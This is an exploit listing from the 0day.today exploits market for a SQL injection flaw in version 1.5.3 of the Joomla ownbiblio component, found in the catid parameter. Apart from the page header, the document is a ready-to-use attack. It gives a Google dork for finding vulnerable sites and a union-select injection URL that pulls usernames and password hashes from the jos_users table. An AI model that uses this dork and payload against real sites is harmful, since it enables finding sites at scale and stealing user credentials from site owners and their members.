[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability

Author
H!tm@N
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3877
Category
web applications
Date add
10-10-2008
Platform
unsorted
====================================================================
Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability
====================================================================


#############################################################################
#							                    #
#          Joomla Component Ownbiblio SQL Injection Vulnerability           #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N

########################################

[~] ScriptName:    "Joomla"
[~] Component:     "Ownbiblio (com_ownbiblio)"
[~] Version:       "1.5.3" 
[~] Author:        "Sebastian Kruvinnus, Michael Kehrwecker"

########################################

[~] DORK: inurl:"com_ownbiblio" catalogue

########################################

[~] Exploit: /index.php?option=com_ownbiblio&view=catalogue&catid=[SQL]
[~] Example: /index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

########################################



#  0day.today [2024-10-05]  #